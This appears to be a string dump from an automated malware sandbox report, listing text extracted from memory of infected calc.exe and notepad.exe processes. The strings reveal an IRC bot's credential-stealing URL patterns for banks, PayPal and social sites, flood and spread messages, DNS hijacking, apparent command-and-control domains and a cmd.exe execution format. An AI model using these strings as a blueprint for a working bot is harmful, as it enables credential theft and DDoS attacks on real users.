pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre>calc.exe_1160:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>calc.pdb</pre><pre>j.OXO</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>name="Microsoft.Windows.Shell.calc"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>CalcMsgPumpWnd</pre><pre>The requested operation may take a very long time to complete.</pre><pre>Do you want to let the calculation continue, or stop the operation now?</pre><pre>Windows Calculator application file</pre><pre>5.1.2600.0 (xpclient.010817-1148)</pre><pre>CALC.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.0</pre><pre>Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.</pre><pre>Do you want to abort the operation now?</pre><pre>calc.hlp</pre><pre>Cannot open Clipboard.TThere is not enough memory for data.</pre><pre>calc.chm</pre>calc.exe_1160_rwx_000A0000_00002000:<pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>458757875</pre><pre>a1ox0.exe</pre><pre>wjjza.exe</pre><pre>tj07a.exe</pre><pre>wd6ql.exe</pre><pre>6tr3f.exe</pre><pre>uc4de.exe</pre><pre>uzue6.exe</pre><pre>tzm0b.exe</pre><pre>xkp0h.exe</pre><pre>m5h8j.exe</pre><pre>sbt6e.exe</pre><pre>1sq28.exe</pre><pre>pla6o.exe</pre><pre>26y6n.exe</pre><pre>z6dea.exe</pre><pre>2ld02.exe</pre><pre>m55uw.exe</pre><pre>5x8mu.exe</pre><pre>640ha.exe</pre><pre>user32.dll</pre><pre>urlmon.dll</pre><pre>URLDownloadToFileA</pre><pre>wininet.dll</pre><pre>http://www.google.com</pre>notepad.exe_1520:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>comdlg32.dll</pre><pre>SHELL32.dll</pre><pre>WINSPOOL.DRV</pre><pre>COMCTL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>notepad.chm</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>notepad.pdb</pre><pre>t%SSh</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegCreateKeyW</pre><pre>RegOpenKeyExA</pre><pre>SetViewportExtEx</pre><pre>GetKeyboardLayout</pre><pre>name="Microsoft.Windows.Shell.notepad"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>&*$#$$#$*</pre><pre>MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM</pre><pre>*.txt</pre><pre>/.SETUP</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>NOTEPAD.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>notepad.hlp</pre><pre>Text Documents (*.txt)</pre><pre>You cannot quit Windows because the Save As dialog</pre><pre>dialog box, and then try quitting Windows again.</pre><pre>Common Dialog error (0xx)</pre><pre>Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.</pre><pre>Not a valid file name.MCannot create the %% file.</pre><pre>Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.</pre><pre>Page %d</pre><pre>Ln %d, Col %d</pre>calc.exe_1160_rwx_00970000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\calc.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\calc.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>calc.exe_1160_rwx_00A00000_00027000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre>calc.exe_1160_rwx_00A28000_00072000:<pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: 